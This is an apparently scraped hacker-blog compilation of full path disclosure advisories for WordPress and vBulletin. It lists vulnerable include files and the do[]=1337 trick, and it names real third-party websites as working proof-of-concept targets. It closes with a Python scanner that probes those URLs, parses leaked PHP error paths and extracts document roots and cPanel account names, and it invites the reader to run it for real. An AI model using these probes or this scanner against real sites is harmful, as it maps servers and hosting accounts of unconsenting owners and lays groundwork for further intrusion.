Friday, 7 February 2014

Path Disclosure


WordPress <= 3.4.2


WordPress <= 3.4.2 discloses its installation path through wp-includes/rss-functions.php: the file calls _deprecated_file() before anything has defined that function, so requesting it directly (instead of through WordPress) makes PHP abort with a fatal error that prints the absolute filesystem path of the file, provided display_errors is on. From that path you get the document root of the site and, on cPanel-style hosting where sites live under /home/<account>/public_html/, usually the cPanel account name as well. To see it, request:
 http://[path]/wp-includes/rss-functions.php 
 Examples: http://tsmp.us/wp-includes/rss-functions.php 
http://tafeio.com/wp-includes/rss-functions.php 
 http://santana1540.com.br/wp-includes/rss-functions.php
 Whether it works depends on display_errors being enabled (common on shared hosting); the original post reports it working on about 90% of the sites tested.


[+] vBulletin 3.x full path disclosure vulnerability
[-] Found by Angel Injection
[-] Version: all 3.x
[-] Risk: informational only, so "Low"
[-] Platform: PHP
[-] http://1337day.com http://r00tw0rm.com http://i313.cc

[+] Thanx To "Mhd1"


The trick is the `do[]=` parameter: vBulletin expects `do` to be a string, but `do[]=1337` makes PHP deliver it as an array. The string handling applied to it then raises a PHP warning, and that warning (when display_errors is on) includes the absolute path of the file where it occurred. The value after `do[]=` does not matter.

The exploit works on:

http://localhost/search.php?do[]=1337

http://localhost/profile.php?do[]=1337

http://localhost/subscription.php?do[]=1337

Online test:

http://www.victim.net/vb/search.php?do[]=lol.cc/313 And 1337day.com

http://www.victim.net/vb/profile.php?do[]=lol.cc/313 And 1337day.com

http://www.victim.net/vb/subscription.php?do[]=lol.cc/313 And 1337day.com


# 1337day.com [2012-07-02]










vBulletin 4.x/5.x multiple Full Path Disclosure vulnerabilities

Requesting any of the following files directly, outside the normal vBulletin entry points, triggers a PHP error that reveals its absolute path (when display_errors is on):

/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subscription_entrylist.php
/includes/api/1/blog_subscription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subscription_addsubscription.php
/includes/api/1/subscription_editfolders.php
/includes/api/1/subscription_viewsubscription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subscription_entrylist.php
/includes/api/2/blog_subscription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subscription_viewsubscription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subscriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php





vBulletin 4.2.0 (forumrunner) Full Path Disclosure

The file forumrunner/include/album.php, shipped with the Forum Runner integration in vBulletin 4.2.0, throws a PHP error when requested directly, and the error text (when display_errors is on) contains the absolute path of the forum. On cPanel-style hosting (/home/<account>/public_html/) that path usually also gives away the cPanel account name. To see it, request: http://[path]/forumrunner/include/album.php. The original post reports it working on about 90% of the forums tested.
 Examples:

http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php




# Exploit Title: WordPress 3.5 multiple path disclosure vulnerabilities
# Date: 12.12.12
# Author: Cyb3rboy
# Vendor or Software Link: wordpress.org
# Version: WordPress 3.5
# Category: [***apps]
# Google dork: [use brain]
# Tested on: Windows

The following files are vulnerable to path disclosure in WordPress 3.5: requesting any of them directly, without going through WordPress, produces a PHP error whose text includes the file's absolute path (when display_errors is on).



/wp-settings.php
PoC: http://sqayasia.com/wp-settings.php
http://www.way2blogging.org/wp-settings.php

/wp-includes/admin-bar.php
PoC: http://sqayasia.com/wp-includes/admin-bar.php
http://www.way2blogging.org/wp-includes/admin-bar.php

/wp-includes/author-template.php
PoC: http://sqayasia.com/wp-includes/author-template.php
http://www.way2blogging.org/wp-includes/author-template.php

/wp-includes/canonical.php
PoC: http://sqayasia.com/wp-includes/canonical.php

/wp-includes/category-template.php
PoC: http://sqayasia.com/wp-includes/category-template.php
http://www.way2blogging.org/wp-includes/category-template.php

/wp-includes/class-wp-embed.php
PoC: http://sqayasia.com/wp-includes/class-wp-embed.php
http://www.way2blogging.org

/wp-includes/media.php
PoC: http://sqayasia.com/wp-includes/media.php

/wp-includes/ms-default-constants.php
PoC: http://sqayasia.com/wp-includes/ms-default-constants.php
http://www.way2blogging.org

/wp-includes/ms-default-filters.php
PoC: http://sqayasia.com/wp-includes/ms-default-filters.php
http://www.way2blogging.org

/wp-includes/ms-settings.php
PoC: http://sqayasia.com/wp-includes/ms-settings.php
http://www.way2blogging.org

/wp-includes/post.php
PoC: http://sqayasia.com/wp-includes/post.php
http://www.way2blogging.org

/wp-includes/rss.php
PoC: http://sqayasia.com/wp-includes/rss.php
http://www.way2blogging.org/wp-includes/rss.php

/wp-includes/user.php
PoC: http://sqayasia.com/wp-includes/user.php
http://www.way2blogging.org/wp-includes/user.php

/wp-includes/theme.php
PoC: http://sqayasia.com/wp-includes/theme.php
http://www.way2blogging.org/wp-includes/theme.php

/wp-includes/vars.php
PoC: http://sqayasia.com/wp-includes/vars.php
http://www.way2blogging.org/wp-includes/vars.php

/wp-includes/class-wp-http-ixr-client.php
PoC: http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php

/wp-includes/class-wp-image-editor-gd.php
PoC: http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php

/wp-includes/class-wp-image-editor-imagick.php
PoC: http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php

/wp-includes/class-wp-xmlrpc-server.php
PoC: http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php

/wp-includes/class.wp-scripts.php
PoC: http://sqayasia.com/wp-includes/class.wp-scripts.php
http://www.way2blogging.org/wp-includes/class.wp-scripts.php

/wp-includes/class.wp-styles.php
PoC: http://sqayasia.com/wp-includes/class.wp-styles.php
http://www.way2blogging.org/wp-includes/class.wp-styles.php

/wp-includes/comment-template.php
PoC: http://sqayasia.com/wp-includes/comment-template.php
http://www.way2blogging.org/wp-includes/comment-template.php

/wp-includes/default-filters.php
PoC: http://sqayasia.com/wp-includes/default-filters.php
http://www.way2blogging.org/wp-includes/default-filters.php

/wp-includes/default-widgets.php
PoC: http://sqayasia.com/wp-includes/default-widgets.php
http://www.way2blogging.org/wp-includes/default-widgets.php

/wp-includes/feed-atom-comments.php
PoC: http://sqayasia.com/wp-includes/feed-atom-comments.php
http://www.way2blogging.org/wp-includes/feed-atom-comments.php

/wp-includes/feed-atom.php
PoC: http://sqayasia.com/wp-includes/feed-atom.php
http://www.way2blogging.org/wp-includes/feed-atom.php

/wp-includes/feed-rdf.php
PoC: http://sqayasia.com/wp-includes/feed-rdf.php
http://www.way2blogging.org/wp-includes/feed-rdf.php

/wp-includes/feed-rss.php
PoC: http://sqayasia.com/wp-includes/feed-rss.php
http://www.way2blogging.org/wp-includes/feed-rss.php

/wp-includes/feed-rss2-comments.php
PoC: http://sqayasia.com/wp-includes/feed-rss2-comments.php
http://www.way2blogging.org/wp-includes/feed-rss2-comments.php

/wp-includes/feed-rss2.php
PoC: http://sqayasia.com/wp-includes/feed-rss2.php
http://www.way2blogging.org/wp-includes/feed-rss2.php

/wp-includes/functions.php
PoC: http://sqayasia.com/wp-includes/functions.php
http://www.way2blogging.org/wp-includes/functions.php
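All of the advisories on this page (WordPress <= 3.4.2 and 3.5, the vBulletin do[] trick, the vBulletin 4.x/5.x include list and the forumrunner file) rely on the same two things: a PHP file that errors out when requested directly, and display_errors leaking the absolute path in that error. The following is an added example, not code from any of the advisories or from WordPress/vBulletin: it builds the probe URLs from a candidate list (plain requests for include files, plus `do[]=1337` for the vBulletin scripts), parses the PHP warning/fatal-error text out of each response with html_errors on or off, and derives the document root and, for the /home/<account>/public_html layout, the cPanel account name. The host target.example, the account name acme and the three response bodies are constructed samples; the error messages, file names and line numbers in them are illustrative, not captured from any real site. The fetch function is injected, so the same code runs offline against the constructed responses or online with http_fetch.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional

# PHP error text with html_errors on ("<b>Warning</b>: ... in <b>/path</b> on line <b>N</b>")
# or off ("Warning: ... in /path on line N"). Unix and Windows drive-letter paths both match.
PHP_ERROR_RE = re.compile(
    r"(?P<kind>Fatal error|Parse error|Warning|Notice|Deprecated|Strict Standards)(?:</b>)?:\s+"
    r"(?P<msg>.*?)\s+in\s+(?:<b>)?"
    r"(?P<path>(?:/|[A-Za-z]:\\)[^<\r\n]+?\.php)(?:</b>)?\s+on\s+line\s+(?:<b>)?(?P<line>\d+)",
    re.S,
)


def extract_errors(body: str) -> List[Dict[str, str]]:
    """Every PHP error in a response body, with the absolute path it leaked."""
    return [m.groupdict() for m in PHP_ERROR_RE.finditer(body)]


def document_root(disclosed: str, requested: str) -> Optional[str]:
    """Recover the web root by stripping the requested URL path off the disclosed file path.
    Returns None when the error came from an included file rather than the requested script."""
    disclosed = disclosed.replace("\\", "/")
    suffix = requested.lstrip("/")
    if disclosed.endswith(suffix):
        return disclosed[: -len(suffix)].rstrip("/")
    return None


def cpanel_account(disclosed: str) -> Optional[str]:
    """cPanel hosts lay sites out as /home/<account>/public_html/...; the directory name is the
    account's login for cPanel and FTP. Returns None for other layouts (e.g. a Windows host)."""
    m = re.match(r"^/home\d*/([A-Za-z0-9_.-]+)/public_html(?:/|$)", disclosed.replace("\\", "/"))
    return m.group(1) if m else None


def probe_urls(base: str, include_files: List[str], array_scripts: List[str]) -> List[str]:
    """Direct requests for unguarded include files, plus the vBulletin trick of sending
    do[]=1337 so that `do` arrives as an array where the code expects a string."""
    base = base.rstrip("/")
    urls = [base + f for f in include_files]
    urls += [base + s + "?" + urllib.parse.urlencode({"do[]": "1337"}) for s in array_scripts]
    return urls


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Real fetcher. PHP fatal errors usually come back as HTTP 500 (sometimes 200) with the
    error in the body, so the body of an HTTPError is returned rather than discarded."""
    req = urllib.request.Request(url, headers={"User-Agent": "fpd-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def scan(base: str, fetch: Callable[[str], str], include_files: List[str],
         array_scripts: List[str]) -> Dict[str, Dict[str, Optional[str]]]:
    """Probe every candidate URL and keep the first leaked path per URL."""
    findings: Dict[str, Dict[str, Optional[str]]] = {}
    for url in probe_urls(base, include_files, array_scripts):
        try:
            body = fetch(url)
        except (urllib.error.URLError, OSError):
            continue  # unreachable host or timeout: nothing to report for this URL
        errors = extract_errors(body)
        if not errors:
            continue
        hit = errors[0]
        findings[url] = {
            "kind": hit["kind"],
            "path": hit["path"],
            "docroot": document_root(hit["path"], urllib.parse.urlsplit(url).path),
            "cpanel_account": cpanel_account(hit["path"]),
        }
    return findings


# Constructed responses (not captured from any real site); messages and line numbers are illustrative.
CONSTRUCTED = {
    "http://target.example/wp-includes/rss-functions.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function _deprecated_file() in "
        "<b>/home/acme/public_html/wp-includes/rss-functions.php</b> on line <b>8</b><br />\n",
    # Warning raised inside an included file, so the requested script path cannot be stripped off.
    "http://target.example/vb/search.php?do%5B%5D=1337":
        "Warning: trim() expects parameter 1 to be string, array given in "
        "/home/acme/public_html/vb/includes/class_core.php on line 2161",
    # Windows host: drive-letter path, no cPanel layout to infer an account from.
    "http://target.example/forumrunner/include/album.php":
        "<b>Warning</b>: Invalid argument supplied for foreach() in "
        "<b>C:\\inetpub\\wwwroot\\forum\\forumrunner\\include\\album.php</b> on line <b>19</b>",
}


def fake_fetch(url: str) -> str:
    """Offline stand-in for http_fetch; anything not in CONSTRUCTED is a clean page."""
    return CONSTRUCTED.get(url, "<html><body>OK</body></html>")


if __name__ == "__main__":
    results = scan("http://target.example", fake_fetch,
                   ["/wp-includes/rss-functions.php", "/forumrunner/include/album.php"],
                   ["/vb/search.php"])
    for url, info in results.items():
        print(url, info)
```

Swap fake_fetch for http_fetch and feed it the file lists from the advisories above to run it for real. Note the vBulletin case: the warning is raised in an included file, so document_root() cannot recover the web root from the requested path, but the cPanel account name is still readable from the /home/<account>/ prefix.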
